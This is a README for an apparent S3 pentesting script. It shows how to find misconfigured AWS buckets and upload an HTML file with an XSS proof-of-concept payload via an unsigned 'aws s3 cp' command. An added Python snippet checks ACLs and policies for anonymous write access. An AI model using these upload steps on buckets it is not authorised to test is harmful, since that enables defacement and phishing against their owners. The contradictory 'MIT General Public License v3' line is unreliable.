S3Exploits is a script that automates finding misconfigured AWS S3 buckets, which can lead a pentester to many exposed vulnerabilities (XSS, phishing, site defacement, and many more).
git clone https://github.com/Aju100/s3-exploit
cd s3-exploit
chmod +x main.sh
./main.sh
If you find a vulnerable bucket, you can create an HTML file that includes an XSS payload.
<html>
<head>
<title>XSS</title>
</head>
<body>
<script>alert(1)</script>
</body>
</html>
aws s3 cp 1.html s3://bucketname --no-sign-request
Go to the bucket's URL, for example s3something.aws.com/1.html
You can also create an image that includes the XSS payload.
Note: Make sure you have installed the AWS CLI.
sudo apt-get install awscli
You must put the list of S3 buckets in s3_buckets to test whether they are vulnerable. If you are pentesting for other companies or organizations, use the tools below to identify S3 buckets.
If you have discovered subdomains, you can also check whether they have S3 buckets.
Make sure you have installed httpx.
cat sub-domains.txt | httpx -status-code --path .s3.amazonaws.com
If you are testing your own S3 buckets, use the commands below to list them and create s3_buckets.txt.
First, configure your AWS credentials.
aws configure
aws s3 ls >> buckets.txt
sed -E 's/([0-9]{1,4}-){1,2}[0-9]{2} ([0-9]{2}:){1,2}[0-9]{2}//g' buckets.txt >> s3_buckets.txt
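For your own buckets, the upload shown earlier with --no-sign-request only succeeds when the bucket's ACL or policy grants write access to anonymous callers. The following added example (not part of S3Exploits) checks for that condition in the parsed output of `aws s3api get-bucket-acl`, the policy document from `aws s3api get-bucket-policy`, and the `PublicAccessBlockConfiguration` from `aws s3api get-public-access-block`. The function names and sample data are assumptions made for illustration.

```python
import json
from fnmatch import fnmatchcase

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    # "*" or {"AWS": "*"} matches any caller, including unsigned requests.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def anonymous_write_findings(acl, policy=None, pab=None):
    """List the reasons an unsigned caller could upload objects to a bucket."""
    pab = pab or {}
    findings = []
    # IgnorePublicAcls makes S3 disregard public grants in the bucket ACL.
    if not pab.get("IgnorePublicAcls"):
        for grant in acl.get("Grants", []):
            perm = grant.get("Permission")
            if grant.get("Grantee", {}).get("URI") == ALL_USERS and perm in ("WRITE", "FULL_CONTROL"):
                findings.append(f"ACL grants {perm} to AllUsers")
    # RestrictPublicBuckets stops anonymous callers from using a public policy.
    if policy and not pab.get("RestrictPublicBuckets"):
        for stmt in _as_list(policy.get("Statement", [])):
            actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
            writes = any(fnmatchcase("s3:putobject", a) for a in actions)
            # Statements with a Condition are not flagged; review those by hand.
            if (stmt.get("Effect") == "Allow" and writes
                    and _is_anonymous(stmt.get("Principal")) and not stmt.get("Condition")):
                findings.append(f"policy statement {stmt.get('Sid', '?')} allows anonymous s3:PutObject")
    return findings

# Constructed sample inputs, not taken from a real bucket.
SAMPLE_ACL = {"Grants": [
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
]}
SAMPLE_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [
  {"Sid": "PublicUpload", "Effect": "Allow", "Principal": "*",
   "Action": ["s3:GetObject", "s3:Put*"], "Resource": "arn:aws:s3:::example-bucket/*"}]}""")

if __name__ == "__main__":
    for reason in anonymous_write_findings(SAMPLE_ACL, SAMPLE_POLICY):
        print(reason)
```

An empty result with both Block Public Access settings enabled means neither path is open to unsigned uploads; account-level Block Public Access settings are not considered here.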
Contributions are always welcome! Please read the contribution guidelines first.
If you need any help anywhere in the process, you can open a GitHub issue.
This project is currently licensed under the MIT General Public License v3. i.e. we guarantee end users the freedom to run, study, share, and modify the software.
Made with ❤️ and Bash